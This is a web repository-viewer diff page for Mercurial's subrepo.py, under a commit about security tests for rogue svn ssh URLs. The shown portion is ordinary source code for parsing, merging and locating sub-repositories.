##// END OF EJS Templates
subrepo: add tests for svn rogue ssh urls (SEC)...
Sean Farley -
r33730:60ee7af2 stable
parent child Browse files
Show More
@@ -1,1995 +1,1999 b''
1 # subrepo.py - sub-repository handling for Mercurial
1 # subrepo.py - sub-repository handling for Mercurial
2 #
2 #
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import copy
10 import copy
11 import errno
11 import errno
12 import hashlib
12 import hashlib
13 import os
13 import os
14 import posixpath
14 import posixpath
15 import re
15 import re
16 import stat
16 import stat
17 import subprocess
17 import subprocess
18 import sys
18 import sys
19 import tarfile
19 import tarfile
20 import xml.dom.minidom
20 import xml.dom.minidom
21
21
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 cmdutil,
25 cmdutil,
26 config,
26 config,
27 encoding,
27 encoding,
28 error,
28 error,
29 exchange,
29 exchange,
30 filemerge,
30 filemerge,
31 match as matchmod,
31 match as matchmod,
32 node,
32 node,
33 pathutil,
33 pathutil,
34 phases,
34 phases,
35 pycompat,
35 pycompat,
36 scmutil,
36 scmutil,
37 util,
37 util,
38 vfs as vfsmod,
38 vfs as vfsmod,
39 )
39 )
40
40
41 hg = None
41 hg = None
42 propertycache = util.propertycache
42 propertycache = util.propertycache
43
43
44 nullstate = ('', '', 'empty')
44 nullstate = ('', '', 'empty')
45
45
46 def _expandedabspath(path):
46 def _expandedabspath(path):
47 '''
47 '''
48 get a path or url and if it is a path expand it and return an absolute path
48 get a path or url and if it is a path expand it and return an absolute path
49 '''
49 '''
50 expandedpath = util.urllocalpath(util.expandpath(path))
50 expandedpath = util.urllocalpath(util.expandpath(path))
51 u = util.url(expandedpath)
51 u = util.url(expandedpath)
52 if not u.scheme:
52 if not u.scheme:
53 path = util.normpath(os.path.abspath(u.path))
53 path = util.normpath(os.path.abspath(u.path))
54 return path
54 return path
55
55
56 def _getstorehashcachename(remotepath):
56 def _getstorehashcachename(remotepath):
57 '''get a unique filename for the store hash cache of a remote repository'''
57 '''get a unique filename for the store hash cache of a remote repository'''
58 return hashlib.sha1(_expandedabspath(remotepath)).hexdigest()[0:12]
58 return hashlib.sha1(_expandedabspath(remotepath)).hexdigest()[0:12]
59
59
60 class SubrepoAbort(error.Abort):
60 class SubrepoAbort(error.Abort):
61 """Exception class used to avoid handling a subrepo error more than once"""
61 """Exception class used to avoid handling a subrepo error more than once"""
62 def __init__(self, *args, **kw):
62 def __init__(self, *args, **kw):
63 self.subrepo = kw.pop('subrepo', None)
63 self.subrepo = kw.pop('subrepo', None)
64 self.cause = kw.pop('cause', None)
64 self.cause = kw.pop('cause', None)
65 error.Abort.__init__(self, *args, **kw)
65 error.Abort.__init__(self, *args, **kw)
66
66
67 def annotatesubrepoerror(func):
67 def annotatesubrepoerror(func):
68 def decoratedmethod(self, *args, **kargs):
68 def decoratedmethod(self, *args, **kargs):
69 try:
69 try:
70 res = func(self, *args, **kargs)
70 res = func(self, *args, **kargs)
71 except SubrepoAbort as ex:
71 except SubrepoAbort as ex:
72 # This exception has already been handled
72 # This exception has already been handled
73 raise ex
73 raise ex
74 except error.Abort as ex:
74 except error.Abort as ex:
75 subrepo = subrelpath(self)
75 subrepo = subrelpath(self)
76 errormsg = str(ex) + ' ' + _('(in subrepository "%s")') % subrepo
76 errormsg = str(ex) + ' ' + _('(in subrepository "%s")') % subrepo
77 # avoid handling this exception by raising a SubrepoAbort exception
77 # avoid handling this exception by raising a SubrepoAbort exception
78 raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
78 raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
79 cause=sys.exc_info())
79 cause=sys.exc_info())
80 return res
80 return res
81 return decoratedmethod
81 return decoratedmethod
82
82
83 def state(ctx, ui):
83 def state(ctx, ui):
84 """return a state dict, mapping subrepo paths configured in .hgsub
84 """return a state dict, mapping subrepo paths configured in .hgsub
85 to tuple: (source from .hgsub, revision from .hgsubstate, kind
85 to tuple: (source from .hgsub, revision from .hgsubstate, kind
86 (key in types dict))
86 (key in types dict))
87 """
87 """
88 p = config.config()
88 p = config.config()
89 repo = ctx.repo()
89 repo = ctx.repo()
90 def read(f, sections=None, remap=None):
90 def read(f, sections=None, remap=None):
91 if f in ctx:
91 if f in ctx:
92 try:
92 try:
93 data = ctx[f].data()
93 data = ctx[f].data()
94 except IOError as err:
94 except IOError as err:
95 if err.errno != errno.ENOENT:
95 if err.errno != errno.ENOENT:
96 raise
96 raise
97 # handle missing subrepo spec files as removed
97 # handle missing subrepo spec files as removed
98 ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
98 ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
99 repo.pathto(f))
99 repo.pathto(f))
100 return
100 return
101 p.parse(f, data, sections, remap, read)
101 p.parse(f, data, sections, remap, read)
102 else:
102 else:
103 raise error.Abort(_("subrepo spec file \'%s\' not found") %
103 raise error.Abort(_("subrepo spec file \'%s\' not found") %
104 repo.pathto(f))
104 repo.pathto(f))
105 if '.hgsub' in ctx:
105 if '.hgsub' in ctx:
106 read('.hgsub')
106 read('.hgsub')
107
107
108 for path, src in ui.configitems('subpaths'):
108 for path, src in ui.configitems('subpaths'):
109 p.set('subpaths', path, src, ui.configsource('subpaths', path))
109 p.set('subpaths', path, src, ui.configsource('subpaths', path))
110
110
111 rev = {}
111 rev = {}
112 if '.hgsubstate' in ctx:
112 if '.hgsubstate' in ctx:
113 try:
113 try:
114 for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
114 for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
115 l = l.lstrip()
115 l = l.lstrip()
116 if not l:
116 if not l:
117 continue
117 continue
118 try:
118 try:
119 revision, path = l.split(" ", 1)
119 revision, path = l.split(" ", 1)
120 except ValueError:
120 except ValueError:
121 raise error.Abort(_("invalid subrepository revision "
121 raise error.Abort(_("invalid subrepository revision "
122 "specifier in \'%s\' line %d")
122 "specifier in \'%s\' line %d")
123 % (repo.pathto('.hgsubstate'), (i + 1)))
123 % (repo.pathto('.hgsubstate'), (i + 1)))
124 rev[path] = revision
124 rev[path] = revision
125 except IOError as err:
125 except IOError as err:
126 if err.errno != errno.ENOENT:
126 if err.errno != errno.ENOENT:
127 raise
127 raise
128
128
129 def remap(src):
129 def remap(src):
130 for pattern, repl in p.items('subpaths'):
130 for pattern, repl in p.items('subpaths'):
131 # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
131 # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
132 # does a string decode.
132 # does a string decode.
133 repl = util.escapestr(repl)
133 repl = util.escapestr(repl)
134 # However, we still want to allow back references to go
134 # However, we still want to allow back references to go
135 # through unharmed, so we turn r'\\1' into r'\1'. Again,
135 # through unharmed, so we turn r'\\1' into r'\1'. Again,
136 # extra escapes are needed because re.sub string decodes.
136 # extra escapes are needed because re.sub string decodes.
137 repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
137 repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
138 try:
138 try:
139 src = re.sub(pattern, repl, src, 1)
139 src = re.sub(pattern, repl, src, 1)
140 except re.error as e:
140 except re.error as e:
141 raise error.Abort(_("bad subrepository pattern in %s: %s")
141 raise error.Abort(_("bad subrepository pattern in %s: %s")
142 % (p.source('subpaths', pattern), e))
142 % (p.source('subpaths', pattern), e))
143 return src
143 return src
144
144
145 state = {}
145 state = {}
146 for path, src in p[''].items():
146 for path, src in p[''].items():
147 kind = 'hg'
147 kind = 'hg'
148 if src.startswith('['):
148 if src.startswith('['):
149 if ']' not in src:
149 if ']' not in src:
150 raise error.Abort(_('missing ] in subrepository source'))
150 raise error.Abort(_('missing ] in subrepository source'))
151 kind, src = src.split(']', 1)
151 kind, src = src.split(']', 1)
152 kind = kind[1:]
152 kind = kind[1:]
153 src = src.lstrip() # strip any extra whitespace after ']'
153 src = src.lstrip() # strip any extra whitespace after ']'
154
154
155 if not util.url(src).isabs():
155 if not util.url(src).isabs():
156 parent = _abssource(repo, abort=False)
156 parent = _abssource(repo, abort=False)
157 if parent:
157 if parent:
158 parent = util.url(parent)
158 parent = util.url(parent)
159 parent.path = posixpath.join(parent.path or '', src)
159 parent.path = posixpath.join(parent.path or '', src)
160 parent.path = posixpath.normpath(parent.path)
160 parent.path = posixpath.normpath(parent.path)
161 joined = str(parent)
161 joined = str(parent)
162 # Remap the full joined path and use it if it changes,
162 # Remap the full joined path and use it if it changes,
163 # else remap the original source.
163 # else remap the original source.
164 remapped = remap(joined)
164 remapped = remap(joined)
165 if remapped == joined:
165 if remapped == joined:
166 src = remap(src)
166 src = remap(src)
167 else:
167 else:
168 src = remapped
168 src = remapped
169
169
170 src = remap(src)
170 src = remap(src)
171 state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)
171 state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)
172
172
173 return state
173 return state
174
174
175 def writestate(repo, state):
175 def writestate(repo, state):
176 """rewrite .hgsubstate in (outer) repo with these subrepo states"""
176 """rewrite .hgsubstate in (outer) repo with these subrepo states"""
177 lines = ['%s %s\n' % (state[s][1], s) for s in sorted(state)
177 lines = ['%s %s\n' % (state[s][1], s) for s in sorted(state)
178 if state[s][1] != nullstate[1]]
178 if state[s][1] != nullstate[1]]
179 repo.wwrite('.hgsubstate', ''.join(lines), '')
179 repo.wwrite('.hgsubstate', ''.join(lines), '')
180
180
181 def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
181 def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
182 """delegated from merge.applyupdates: merging of .hgsubstate file
182 """delegated from merge.applyupdates: merging of .hgsubstate file
183 in working context, merging context and ancestor context"""
183 in working context, merging context and ancestor context"""
184 if mctx == actx: # backwards?
184 if mctx == actx: # backwards?
185 actx = wctx.p1()
185 actx = wctx.p1()
186 s1 = wctx.substate
186 s1 = wctx.substate
187 s2 = mctx.substate
187 s2 = mctx.substate
188 sa = actx.substate
188 sa = actx.substate
189 sm = {}
189 sm = {}
190
190
191 repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))
191 repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))
192
192
193 def debug(s, msg, r=""):
193 def debug(s, msg, r=""):
194 if r:
194 if r:
195 r = "%s:%s:%s" % r
195 r = "%s:%s:%s" % r
196 repo.ui.debug(" subrepo %s: %s %s\n" % (s, msg, r))
196 repo.ui.debug(" subrepo %s: %s %s\n" % (s, msg, r))
197
197
198 promptssrc = filemerge.partextras(labels)
198 promptssrc = filemerge.partextras(labels)
199 for s, l in sorted(s1.iteritems()):
199 for s, l in sorted(s1.iteritems()):
200 prompts = None
200 prompts = None
201 a = sa.get(s, nullstate)
201 a = sa.get(s, nullstate)
202 ld = l # local state with possible dirty flag for compares
202 ld = l # local state with possible dirty flag for compares
203 if wctx.sub(s).dirty():
203 if wctx.sub(s).dirty():
204 ld = (l[0], l[1] + "+")
204 ld = (l[0], l[1] + "+")
205 if wctx == actx: # overwrite
205 if wctx == actx: # overwrite
206 a = ld
206 a = ld
207
207
208 prompts = promptssrc.copy()
208 prompts = promptssrc.copy()
209 prompts['s'] = s
209 prompts['s'] = s
210 if s in s2:
210 if s in s2:
211 r = s2[s]
211 r = s2[s]
212 if ld == r or r == a: # no change or local is newer
212 if ld == r or r == a: # no change or local is newer
213 sm[s] = l
213 sm[s] = l
214 continue
214 continue
215 elif ld == a: # other side changed
215 elif ld == a: # other side changed
216 debug(s, "other changed, get", r)
216 debug(s, "other changed, get", r)
217 wctx.sub(s).get(r, overwrite)
217 wctx.sub(s).get(r, overwrite)
218 sm[s] = r
218 sm[s] = r
219 elif ld[0] != r[0]: # sources differ
219 elif ld[0] != r[0]: # sources differ
220 prompts['lo'] = l[0]
220 prompts['lo'] = l[0]
221 prompts['ro'] = r[0]
221 prompts['ro'] = r[0]
222 if repo.ui.promptchoice(
222 if repo.ui.promptchoice(
223 _(' subrepository sources for %(s)s differ\n'
223 _(' subrepository sources for %(s)s differ\n'
224 'use (l)ocal%(l)s source (%(lo)s)'
224 'use (l)ocal%(l)s source (%(lo)s)'
225 ' or (r)emote%(o)s source (%(ro)s)?'
225 ' or (r)emote%(o)s source (%(ro)s)?'
226 '$$ &Local $$ &Remote') % prompts, 0):
226 '$$ &Local $$ &Remote') % prompts, 0):
227 debug(s, "prompt changed, get", r)
227 debug(s, "prompt changed, get", r)
228 wctx.sub(s).get(r, overwrite)
228 wctx.sub(s).get(r, overwrite)
229 sm[s] = r
229 sm[s] = r
230 elif ld[1] == a[1]: # local side is unchanged
230 elif ld[1] == a[1]: # local side is unchanged
231 debug(s, "other side changed, get", r)
231 debug(s, "other side changed, get", r)
232 wctx.sub(s).get(r, overwrite)
232 wctx.sub(s).get(r, overwrite)
233 sm[s] = r
233 sm[s] = r
234 else:
234 else:
235 debug(s, "both sides changed")
235 debug(s, "both sides changed")
236 srepo = wctx.sub(s)
236 srepo = wctx.sub(s)
237 prompts['sl'] = srepo.shortid(l[1])
237 prompts['sl'] = srepo.shortid(l[1])
238 prompts['sr'] = srepo.shortid(r[1])
238 prompts['sr'] = srepo.shortid(r[1])
239 option = repo.ui.promptchoice(
239 option = repo.ui.promptchoice(
240 _(' subrepository %(s)s diverged (local revision: %(sl)s, '
240 _(' subrepository %(s)s diverged (local revision: %(sl)s, '
241 'remote revision: %(sr)s)\n'
241 'remote revision: %(sr)s)\n'
242 '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
242 '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
243 '$$ &Merge $$ &Local $$ &Remote')
243 '$$ &Merge $$ &Local $$ &Remote')
244 % prompts, 0)
244 % prompts, 0)
245 if option == 0:
245 if option == 0:
246 wctx.sub(s).merge(r)
246 wctx.sub(s).merge(r)
247 sm[s] = l
247 sm[s] = l
248 debug(s, "merge with", r)
248 debug(s, "merge with", r)
249 elif option == 1:
249 elif option == 1:
250 sm[s] = l
250 sm[s] = l
251 debug(s, "keep local subrepo revision", l)
251 debug(s, "keep local subrepo revision", l)
252 else:
252 else:
253 wctx.sub(s).get(r, overwrite)
253 wctx.sub(s).get(r, overwrite)
254 sm[s] = r
254 sm[s] = r
255 debug(s, "get remote subrepo revision", r)
255 debug(s, "get remote subrepo revision", r)
256 elif ld == a: # remote removed, local unchanged
256 elif ld == a: # remote removed, local unchanged
257 debug(s, "remote removed, remove")
257 debug(s, "remote removed, remove")
258 wctx.sub(s).remove()
258 wctx.sub(s).remove()
259 elif a == nullstate: # not present in remote or ancestor
259 elif a == nullstate: # not present in remote or ancestor
260 debug(s, "local added, keep")
260 debug(s, "local added, keep")
261 sm[s] = l
261 sm[s] = l
262 continue
262 continue
263 else:
263 else:
264 if repo.ui.promptchoice(
264 if repo.ui.promptchoice(
265 _(' local%(l)s changed subrepository %(s)s'
265 _(' local%(l)s changed subrepository %(s)s'
266 ' which remote%(o)s removed\n'
266 ' which remote%(o)s removed\n'
267 'use (c)hanged version or (d)elete?'
267 'use (c)hanged version or (d)elete?'
268 '$$ &Changed $$ &Delete') % prompts, 0):
268 '$$ &Changed $$ &Delete') % prompts, 0):
269 debug(s, "prompt remove")
269 debug(s, "prompt remove")
270 wctx.sub(s).remove()
270 wctx.sub(s).remove()
271
271
272 for s, r in sorted(s2.items()):
272 for s, r in sorted(s2.items()):
273 prompts = None
273 prompts = None
274 if s in s1:
274 if s in s1:
275 continue
275 continue
276 elif s not in sa:
276 elif s not in sa:
277 debug(s, "remote added, get", r)
277 debug(s, "remote added, get", r)
278 mctx.sub(s).get(r)
278 mctx.sub(s).get(r)
279 sm[s] = r
279 sm[s] = r
280 elif r != sa[s]:
280 elif r != sa[s]:
281 prompts = promptssrc.copy()
281 prompts = promptssrc.copy()
282 prompts['s'] = s
282 prompts['s'] = s
283 if repo.ui.promptchoice(
283 if repo.ui.promptchoice(
284 _(' remote%(o)s changed subrepository %(s)s'
284 _(' remote%(o)s changed subrepository %(s)s'
285 ' which local%(l)s removed\n'
285 ' which local%(l)s removed\n'
286 'use (c)hanged version or (d)elete?'
286 'use (c)hanged version or (d)elete?'
287 '$$ &Changed $$ &Delete') % prompts, 0) == 0:
287 '$$ &Changed $$ &Delete') % prompts, 0) == 0:
288 debug(s, "prompt recreate", r)
288 debug(s, "prompt recreate", r)
289 mctx.sub(s).get(r)
289 mctx.sub(s).get(r)
290 sm[s] = r
290 sm[s] = r
291
291
292 # record merged .hgsubstate
292 # record merged .hgsubstate
293 writestate(repo, sm)
293 writestate(repo, sm)
294 return sm
294 return sm
295
295
296 def _updateprompt(ui, sub, dirty, local, remote):
296 def _updateprompt(ui, sub, dirty, local, remote):
297 if dirty:
297 if dirty:
298 msg = (_(' subrepository sources for %s differ\n'
298 msg = (_(' subrepository sources for %s differ\n'
299 'use (l)ocal source (%s) or (r)emote source (%s)?'
299 'use (l)ocal source (%s) or (r)emote source (%s)?'
300 '$$ &Local $$ &Remote')
300 '$$ &Local $$ &Remote')
301 % (subrelpath(sub), local, remote))
301 % (subrelpath(sub), local, remote))
302 else:
302 else:
303 msg = (_(' subrepository sources for %s differ (in checked out '
303 msg = (_(' subrepository sources for %s differ (in checked out '
304 'version)\n'
304 'version)\n'
305 'use (l)ocal source (%s) or (r)emote source (%s)?'
305 'use (l)ocal source (%s) or (r)emote source (%s)?'
306 '$$ &Local $$ &Remote')
306 '$$ &Local $$ &Remote')
307 % (subrelpath(sub), local, remote))
307 % (subrelpath(sub), local, remote))
308 return ui.promptchoice(msg, 0)
308 return ui.promptchoice(msg, 0)
309
309
310 def reporelpath(repo):
310 def reporelpath(repo):
311 """return path to this (sub)repo as seen from outermost repo"""
311 """return path to this (sub)repo as seen from outermost repo"""
312 parent = repo
312 parent = repo
313 while util.safehasattr(parent, '_subparent'):
313 while util.safehasattr(parent, '_subparent'):
314 parent = parent._subparent
314 parent = parent._subparent
315 return repo.root[len(pathutil.normasprefix(parent.root)):]
315 return repo.root[len(pathutil.normasprefix(parent.root)):]
316
316
317 def subrelpath(sub):
317 def subrelpath(sub):
318 """return path to this subrepo as seen from outermost repo"""
318 """return path to this subrepo as seen from outermost repo"""
319 return sub._relpath
319 return sub._relpath
320
320
321 def _abssource(repo, push=False, abort=True):
321 def _abssource(repo, push=False, abort=True):
322 """return pull/push path of repo - either based on parent repo .hgsub info
322 """return pull/push path of repo - either based on parent repo .hgsub info
323 or on the top repo config. Abort or return None if no source found."""
323 or on the top repo config. Abort or return None if no source found."""
324 if util.safehasattr(repo, '_subparent'):
324 if util.safehasattr(repo, '_subparent'):
325 source = util.url(repo._subsource)
325 source = util.url(repo._subsource)
326 if source.isabs():
326 if source.isabs():
327 return str(source)
327 return str(source)
328 source.path = posixpath.normpath(source.path)
328 source.path = posixpath.normpath(source.path)
329 parent = _abssource(repo._subparent, push, abort=False)
329 parent = _abssource(repo._subparent, push, abort=False)
330 if parent:
330 if parent:
331 parent = util.url(util.pconvert(parent))
331 parent = util.url(util.pconvert(parent))
332 parent.path = posixpath.join(parent.path or '', source.path)
332 parent.path = posixpath.join(parent.path or '', source.path)
333 parent.path = posixpath.normpath(parent.path)
333 parent.path = posixpath.normpath(parent.path)
334 return str(parent)
334 return str(parent)
335 else: # recursion reached top repo
335 else: # recursion reached top repo
336 if util.safehasattr(repo, '_subtoppath'):
336 if util.safehasattr(repo, '_subtoppath'):
337 return repo._subtoppath
337 return repo._subtoppath
338 if push and repo.ui.config('paths', 'default-push'):
338 if push and repo.ui.config('paths', 'default-push'):
339 return repo.ui.config('paths', 'default-push')
339 return repo.ui.config('paths', 'default-push')
340 if repo.ui.config('paths', 'default'):
340 if repo.ui.config('paths', 'default'):
341 return repo.ui.config('paths', 'default')
341 return repo.ui.config('paths', 'default')
342 if repo.shared():
342 if repo.shared():
343 # chop off the .hg component to get the default path form
343 # chop off the .hg component to get the default path form
344 return os.path.dirname(repo.sharedpath)
344 return os.path.dirname(repo.sharedpath)
345 if abort:
345 if abort:
346 raise error.Abort(_("default path for subrepository not found"))
346 raise error.Abort(_("default path for subrepository not found"))
347
347
348 def _sanitize(ui, vfs, ignore):
348 def _sanitize(ui, vfs, ignore):
349 for dirname, dirs, names in vfs.walk():
349 for dirname, dirs, names in vfs.walk():
350 for i, d in enumerate(dirs):
350 for i, d in enumerate(dirs):
351 if d.lower() == ignore:
351 if d.lower() == ignore:
352 del dirs[i]
352 del dirs[i]
353 break
353 break
354 if vfs.basename(dirname).lower() != '.hg':
354 if vfs.basename(dirname).lower() != '.hg':
355 continue
355 continue
356 for f in names:
356 for f in names:
357 if f.lower() == 'hgrc':
357 if f.lower() == 'hgrc':
358 ui.warn(_("warning: removing potentially hostile 'hgrc' "
358 ui.warn(_("warning: removing potentially hostile 'hgrc' "
359 "in '%s'\n") % vfs.join(dirname))
359 "in '%s'\n") % vfs.join(dirname))
360 vfs.unlink(vfs.reljoin(dirname, f))
360 vfs.unlink(vfs.reljoin(dirname, f))
361
361
362 def subrepo(ctx, path, allowwdir=False, allowcreate=True):
362 def subrepo(ctx, path, allowwdir=False, allowcreate=True):
363 """return instance of the right subrepo class for subrepo in path"""
363 """return instance of the right subrepo class for subrepo in path"""
364 # subrepo inherently violates our import layering rules
364 # subrepo inherently violates our import layering rules
365 # because it wants to make repo objects from deep inside the stack
365 # because it wants to make repo objects from deep inside the stack
366 # so we manually delay the circular imports to not break
366 # so we manually delay the circular imports to not break
367 # scripts that don't use our demand-loading
367 # scripts that don't use our demand-loading
368 global hg
368 global hg
369 from . import hg as h
369 from . import hg as h
370 hg = h
370 hg = h
371
371
372 pathutil.pathauditor(ctx.repo().root)(path)
372 pathutil.pathauditor(ctx.repo().root)(path)
373 state = ctx.substate[path]
373 state = ctx.substate[path]
374 if state[2] not in types:
374 if state[2] not in types:
375 raise error.Abort(_('unknown subrepo type %s') % state[2])
375 raise error.Abort(_('unknown subrepo type %s') % state[2])
376 if allowwdir:
376 if allowwdir:
377 state = (state[0], ctx.subrev(path), state[2])
377 state = (state[0], ctx.subrev(path), state[2])
378 return types[state[2]](ctx, path, state[:2], allowcreate)
378 return types[state[2]](ctx, path, state[:2], allowcreate)
379
379
380 def nullsubrepo(ctx, path, pctx):
380 def nullsubrepo(ctx, path, pctx):
381 """return an empty subrepo in pctx for the extant subrepo in ctx"""
381 """return an empty subrepo in pctx for the extant subrepo in ctx"""
382 # subrepo inherently violates our import layering rules
382 # subrepo inherently violates our import layering rules
383 # because it wants to make repo objects from deep inside the stack
383 # because it wants to make repo objects from deep inside the stack
384 # so we manually delay the circular imports to not break
384 # so we manually delay the circular imports to not break
385 # scripts that don't use our demand-loading
385 # scripts that don't use our demand-loading
386 global hg
386 global hg
387 from . import hg as h
387 from . import hg as h
388 hg = h
388 hg = h
389
389
390 pathutil.pathauditor(ctx.repo().root)(path)
390 pathutil.pathauditor(ctx.repo().root)(path)
391 state = ctx.substate[path]
391 state = ctx.substate[path]
392 if state[2] not in types:
392 if state[2] not in types:
393 raise error.Abort(_('unknown subrepo type %s') % state[2])
393 raise error.Abort(_('unknown subrepo type %s') % state[2])
394 subrev = ''
394 subrev = ''
395 if state[2] == 'hg':
395 if state[2] == 'hg':
396 subrev = "0" * 40
396 subrev = "0" * 40
397 return types[state[2]](pctx, path, (state[0], subrev), True)
397 return types[state[2]](pctx, path, (state[0], subrev), True)
398
398
399 def newcommitphase(ui, ctx):
399 def newcommitphase(ui, ctx):
400 commitphase = phases.newcommitphase(ui)
400 commitphase = phases.newcommitphase(ui)
401 substate = getattr(ctx, "substate", None)
401 substate = getattr(ctx, "substate", None)
402 if not substate:
402 if not substate:
403 return commitphase
403 return commitphase
404 check = ui.config('phases', 'checksubrepos')
404 check = ui.config('phases', 'checksubrepos')
405 if check not in ('ignore', 'follow', 'abort'):
405 if check not in ('ignore', 'follow', 'abort'):
406 raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
406 raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
407 % (check))
407 % (check))
408 if check == 'ignore':
408 if check == 'ignore':
409 return commitphase
409 return commitphase
410 maxphase = phases.public
410 maxphase = phases.public
411 maxsub = None
411 maxsub = None
412 for s in sorted(substate):
412 for s in sorted(substate):
413 sub = ctx.sub(s)
413 sub = ctx.sub(s)
414 subphase = sub.phase(substate[s][1])
414 subphase = sub.phase(substate[s][1])
415 if maxphase < subphase:
415 if maxphase < subphase:
416 maxphase = subphase
416 maxphase = subphase
417 maxsub = s
417 maxsub = s
418 if commitphase < maxphase:
418 if commitphase < maxphase:
419 if check == 'abort':
419 if check == 'abort':
420 raise error.Abort(_("can't commit in %s phase"
420 raise error.Abort(_("can't commit in %s phase"
421 " conflicting %s from subrepository %s") %
421 " conflicting %s from subrepository %s") %
422 (phases.phasenames[commitphase],
422 (phases.phasenames[commitphase],
423 phases.phasenames[maxphase], maxsub))
423 phases.phasenames[maxphase], maxsub))
424 ui.warn(_("warning: changes are committed in"
424 ui.warn(_("warning: changes are committed in"
425 " %s phase from subrepository %s\n") %
425 " %s phase from subrepository %s\n") %
426 (phases.phasenames[maxphase], maxsub))
426 (phases.phasenames[maxphase], maxsub))
427 return maxphase
427 return maxphase
428 return commitphase
428 return commitphase
429
429
430 # subrepo classes need to implement the following abstract class:
430 # subrepo classes need to implement the following abstract class:
431
431
432 class abstractsubrepo(object):
432 class abstractsubrepo(object):
433
433
434 def __init__(self, ctx, path):
434 def __init__(self, ctx, path):
435 """Initialize abstractsubrepo part
435 """Initialize abstractsubrepo part
436
436
437 ``ctx`` is the context referring this subrepository in the
437 ``ctx`` is the context referring this subrepository in the
438 parent repository.
438 parent repository.
439
439
440 ``path`` is the path to this subrepository as seen from
440 ``path`` is the path to this subrepository as seen from
441 innermost repository.
441 innermost repository.
442 """
442 """
443 self.ui = ctx.repo().ui
443 self.ui = ctx.repo().ui
444 self._ctx = ctx
444 self._ctx = ctx
445 self._path = path
445 self._path = path
446
446
447 def addwebdirpath(self, serverpath, webconf):
447 def addwebdirpath(self, serverpath, webconf):
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
449
449
450 ``serverpath`` is the path component of the URL for this repo.
450 ``serverpath`` is the path component of the URL for this repo.
451
451
452 ``webconf`` is the dictionary of hgwebdir entries.
452 ``webconf`` is the dictionary of hgwebdir entries.
453 """
453 """
454 pass
454 pass
455
455
456 def storeclean(self, path):
456 def storeclean(self, path):
457 """
457 """
458 returns true if the repository has not changed since it was last
458 returns true if the repository has not changed since it was last
459 cloned from or pushed to a given repository.
459 cloned from or pushed to a given repository.
460 """
460 """
461 return False
461 return False
462
462
463 def dirty(self, ignoreupdate=False, missing=False):
463 def dirty(self, ignoreupdate=False, missing=False):
464 """returns true if the dirstate of the subrepo is dirty or does not
464 """returns true if the dirstate of the subrepo is dirty or does not
465 match current stored state. If ignoreupdate is true, only check
465 match current stored state. If ignoreupdate is true, only check
466 whether the subrepo has uncommitted changes in its dirstate. If missing
466 whether the subrepo has uncommitted changes in its dirstate. If missing
467 is true, check for deleted files.
467 is true, check for deleted files.
468 """
468 """
469 raise NotImplementedError
469 raise NotImplementedError
470
470
471 def dirtyreason(self, ignoreupdate=False, missing=False):
471 def dirtyreason(self, ignoreupdate=False, missing=False):
472 """return reason string if it is ``dirty()``
472 """return reason string if it is ``dirty()``
473
473
474 Returned string should have enough information for the message
474 Returned string should have enough information for the message
475 of exception.
475 of exception.
476
476
477 This returns None, otherwise.
477 This returns None, otherwise.
478 """
478 """
479 if self.dirty(ignoreupdate=ignoreupdate, missing=missing):
479 if self.dirty(ignoreupdate=ignoreupdate, missing=missing):
480 return _('uncommitted changes in subrepository "%s"'
480 return _('uncommitted changes in subrepository "%s"'
481 ) % subrelpath(self)
481 ) % subrelpath(self)
482
482
483 def bailifchanged(self, ignoreupdate=False, hint=None):
483 def bailifchanged(self, ignoreupdate=False, hint=None):
484 """raise Abort if subrepository is ``dirty()``
484 """raise Abort if subrepository is ``dirty()``
485 """
485 """
486 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate,
486 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate,
487 missing=True)
487 missing=True)
488 if dirtyreason:
488 if dirtyreason:
489 raise error.Abort(dirtyreason, hint=hint)
489 raise error.Abort(dirtyreason, hint=hint)
490
490
491 def basestate(self):
491 def basestate(self):
492 """current working directory base state, disregarding .hgsubstate
492 """current working directory base state, disregarding .hgsubstate
493 state and working directory modifications"""
493 state and working directory modifications"""
494 raise NotImplementedError
494 raise NotImplementedError
495
495
496 def checknested(self, path):
496 def checknested(self, path):
497 """check if path is a subrepository within this repository"""
497 """check if path is a subrepository within this repository"""
498 return False
498 return False
499
499
500 def commit(self, text, user, date):
500 def commit(self, text, user, date):
501 """commit the current changes to the subrepo with the given
501 """commit the current changes to the subrepo with the given
502 log message. Use given user and date if possible. Return the
502 log message. Use given user and date if possible. Return the
503 new state of the subrepo.
503 new state of the subrepo.
504 """
504 """
505 raise NotImplementedError
505 raise NotImplementedError
506
506
507 def phase(self, state):
507 def phase(self, state):
508 """returns phase of specified state in the subrepository.
508 """returns phase of specified state in the subrepository.
509 """
509 """
510 return phases.public
510 return phases.public
511
511
512 def remove(self):
512 def remove(self):
513 """remove the subrepo
513 """remove the subrepo
514
514
515 (should verify the dirstate is not dirty first)
515 (should verify the dirstate is not dirty first)
516 """
516 """
